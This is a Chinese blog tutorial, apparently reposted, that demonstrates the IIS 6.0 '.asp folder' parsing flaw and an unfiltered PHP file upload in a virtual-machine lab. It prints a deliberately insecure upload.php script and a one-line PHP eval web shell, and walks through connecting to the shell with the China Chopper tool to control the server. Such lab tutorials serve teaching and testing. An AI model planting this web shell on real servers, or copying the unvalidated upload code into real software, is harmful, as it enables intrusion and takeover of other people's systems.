ctf-web:文件上传漏洞和文件解析漏洞

ctf-web:文件上传漏洞和文件解析漏洞这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍.其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,还有这几个漏洞的利用就是web渗透…这不就是我好几年前看的东西么…当然,其实我也学的不是很精通,只是稍微会一点,就不夸夸其谈了.先说说这两个漏洞的区别.一.文件上传漏洞这个漏洞产生的原因是因为上传文件的不严谨所产生的.比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将.

大家好,又见面了,我是你们的朋友全栈君。

这次的内容是关于文件上传的漏洞和文件解析的漏洞的内容,在下面我会进行一个关于这两个方面的内容的实际操作以及原理介绍.
其实我一直想学的就是web渗透,但是一直都不知道web渗透都有什么后来才知道居然就是sql注入,还有这几个漏洞的利用就是web渗透…这不就是我好几年前看的东西么…
当然,其实我也学的不是很精通,只是稍微会一点,就不夸夸其谈了.
先说说这两个漏洞的区别.
一.文件上传漏洞
这个漏洞产生的原因是因为上传文件的不严谨所产生的.
比如我恶意上传了一个一句话木马,但是服务器没有进行对文件的过滤,就会将上传的文件存放在服务器,这样是十分危险的.并且一般和后面的文件解析漏洞配合在一起使用.
二.文件解析漏洞
这个漏洞是由于服务器的原因造成的,就比如我们一会儿要举例的iis6.0服务器就有这个漏洞.
简单来说,在iis6.0服务器上,如果服务器有一个”xxx.asp”文件夹,那么就会将这个文件下面的所有文件都当成一个asp脚本去执行.

想想看,如果我们上传了一个删除系统数据库的病毒文件上去,然后又被解析成了某种语法去执行,是不是后果很可怕?
因此,我会特地去讲一下这个东西的如何去实现的.后面我会把网站的源码附上.很多服务器都存在这个漏洞,我这里就介绍iis6.0的文件解析漏洞,想看其他的服务器的漏洞可以去百度一下.
工具的话我把名字发上来,自己去找一下.
实验环境:虚拟机win2003一台,软件phpstudy,中国菜刀

一.iis6.0服务器的文件解析漏洞

前面已经说过,iis6.0的漏洞就是会把xxx.asp文件夹下的文件都当作asp文件执行,我们试试便知.
win2003都会自带iis6,因此直接安装就好,安装教程我就不发了,百度有.
如图,此刻已经是安装好的.记得点到web的选项,按照图中进行配置.
在这里插入图片描述
此刻我们已经搭建网站成功.用主机输入服务器ip即可进行访问.由于我之前搭建phpstudy占用了80端口,我就把端口改成了82.你们在做的时候应该是不需要这一步的.
在这里插入图片描述
配置好以后,点击网站,然后右键那个默认网站,点击停用.
在这里插入图片描述
之后右键网站->新建->网站,新建一个自己的网站.我的已经建好了,就不做多余的演示了
在这里插入图片描述

需要注意的是,在新建网站的时候,有个运行脚本的选项要选上.如图
在这里插入图片描述

在这个里面点击右键,添加一个文件,和文件夹,文件名字叫做”index.html”,文件夹名字随便起一个以.asp结尾的即可,我的是wzc.asp.然后在文件夹里面新建一个文件,名字随便起一个,比如1.txt.
在这里插入图片描述
在这里插入图片描述
然后在这两个新建的1.txt和index.html都写入以下的内容:

<%
response.write("My first ASP script!")
%>

为什么要这么建文件呢?其实就是为了验证这个漏洞的.上面的代码是asp的语法,在屏幕上显示一句话.
如果文件被解析成了asp文件,那么就会只显示引号里面的内容.
如果没有的话,就直接把所有内容都显示出来.
因此.我们新建了这两个文件用来验证.

验证一:访问非asp文件夹下的文件(我的端口是81)

也就是网站的主页.我用主机进行访问时,页面显示的是这样的:
在这里插入图片描述
看,是不是直接把文件当成了一个txt文本显示了出来?

验证二:访问以.asp结尾文件夹下的文件

访问结果如图:
在这里插入图片描述
果然,我们的代码被当成了asp脚本执行了.由此验证,我们的iis6.0确实存在这个漏洞.

二.文件上传漏洞和文件解析漏洞的结合使用

文件上传漏洞产生的原因就不像上一个是因为服务器产生的了,而是因为程序员的不严谨而产生的.
在一些允许上传文件的网站中,编写php后台脚本时,不会对文件近进行检查,所以有一些黑客会利用这个上传一个叫”一句话木马”的脚本.
这种脚本属于木马,当上传成功以后,在攻击者的电脑使用比如”中国菜刀”之类的软件进行连接,最终为所欲为.
当然,中国菜刀属于比较落后的软甲,比较先进的有冰蝎等软件.有兴趣可以百度.
由此可见,这种漏洞的危害性是非常大的.下面我会演示一下这个过程.

过程实现

首先安装phpstudy,然后在你的服务器下添加下面两个网站.源码发在下面.
文件一:upload-file.html

<html>
<head>
 <title> 文件上传之解析漏洞~php</title>
 </head>
<body>

<form action="upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file" /> 
<br />
<input type="submit" name="submit" value="提交" />
</form>

</body>
</html>

文件二:upload.php

<?php

  if ($_FILES["file"]["error"] > 0)
    { 
   
    echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
    }
  else
    { 
   
    echo "Upload: " . $_FILES["file"]["name"] . "<br />";
    echo "Type: " . $_FILES["file"]["type"] . "<br />";
    echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
    echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";

    if (file_exists("upload/" . $_FILES["file"]["name"]))
      { 
   
      echo $_FILES["file"]["name"] . " already exists. ";
      }
    else
      { 
   
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "upload/" . $_FILES["file"]["name"]);
      echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
      }
    }
 
?>

放在如图的位置.
在这里插入图片描述
远程访问以下,发现成功.
在这里插入图片描述
我们随便上传一个php文件.
在这里插入图片描述
…连点防御都没有(从那个php代码就可以看出,不过我是从攻击者的角度出发的,由此可证明这个php代码有文件上传的漏洞).
如图,在服务器下有个upload文件,里面就是我们上传的文件.
在这里插入图片描述
这个php一句话木马只是用来测试的,是为了看看能不能上传成功.现在我把一句话木马源码奉上.

<?php eval($_POST["wzc"]);?>

这段代码的原理我就不解释了.目的是为了方便使中国菜刀进行连接.你需要修改的使引号里面的内容,这个是后面中国菜刀连接是的密码.
如图,这个是我的中国菜刀的界面,按照图中的方式配置.
在这里插入图片描述
上面把你的一句话木马的网站上的路径填上.我当时为了方便,把名字改成了”1.php”.后面的空填刚刚的密码,下面记得选择php(eval)代码类型.连接以后,右键文件管理,会产生如图的效果.
在这里插入图片描述
看,现在我们就进到服务器里面了,接下来想怎么搞就怎么搞了.

好了,就写这么多吧.
剩余的也懒的想了,如果还想继续看一些东西的话,可以关注我,我后续会发一些比如数据库注入,软件破解之类的东西.

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/137511.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • matlab中的振铃现象是啥,振铃现象产生的原因

    matlab中的振铃现象是啥,振铃现象产生的原因振铃现象是怎么回事?是什么?如何减小和抑制上冲及振铃?下面就由小编告诉大家和抑制方法吧!由于任何传输线都不可避免地存在着引线电阻、引线电感和杂散电容,因此,一个标准的脉冲信号在经过较长的传输线后,极易产生上冲和振铃现象。大量的实验表明,阴线电阻可使脉冲的平均振幅减小;而杂散电容和引线电感的存在,则是产生上冲和振铃的根本原因。在脉冲前沿上升时间相同的条件下,阴线电感越大,上冲及振铃现象就越严重;杂散…

  • python之有趣的二维码—–二维码表白记

    python之有趣的二维码—–二维码表白记

  • quartz定时任务使用_netty定时调度

    quartz定时任务使用_netty定时调度定时任务调度工具之Quartz(一)一、Quartz介绍OpenSymphony提供的强大的开源任务调度框架;官网:http://www.quartz-scheduler.org/纯Java实

  • 树莓派连接WiFi网络__2019.05.18

    树莓派连接WiFi网络__2019.05.18原文链接:http://sh.qihoo.com/pc/9ac657e0f6b386110?cota=4&tj_url=xz&sign=360_e39369d1&refer_scene=so_1工具/原料树莓派3代方法/步骤1:登录已经刷入系统的树莓派默认用户名pi密码raspberry方法/步骤2:登录系统以后我们使用ifconfig…

  • cosx等价无穷小_第一章 函数与极限 第七节 无穷小的比较[通俗易懂]

    cosx等价无穷小_第一章 函数与极限 第七节 无穷小的比较[通俗易懂]我的公众号“每日晴天”,可关注领取我的笔记pdf版哦~——————————————————————————本文主要首先把书上的定义和知识点总结起来,方便复习要点背诵,同时在最后分割线之后补充自己当时在学习定义的过程中的理解!欢迎评论自己不懂的内容,我后续补充理解哦~谢谢支持(#^.^#)学理科其…

  • idea打开工程无法运行java程序_如何运行一个java程序

    idea打开工程无法运行java程序_如何运行一个java程序有时候想运行别人的项目,但是别人的项目并非IDEA项目(甚至只有源码),当我们打开项目时候,并不能运行,我们却不知道怎么办。经过多次查找和尝试,最终终于能够运行起来了。记一下解决的方法。这是源码打开的项目首先,查看sdk是否设置了。可以在File=》ProjectStructure=》Project里面查看并设置。但是,设置后还是不可以运行。如下图:设置SDK…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号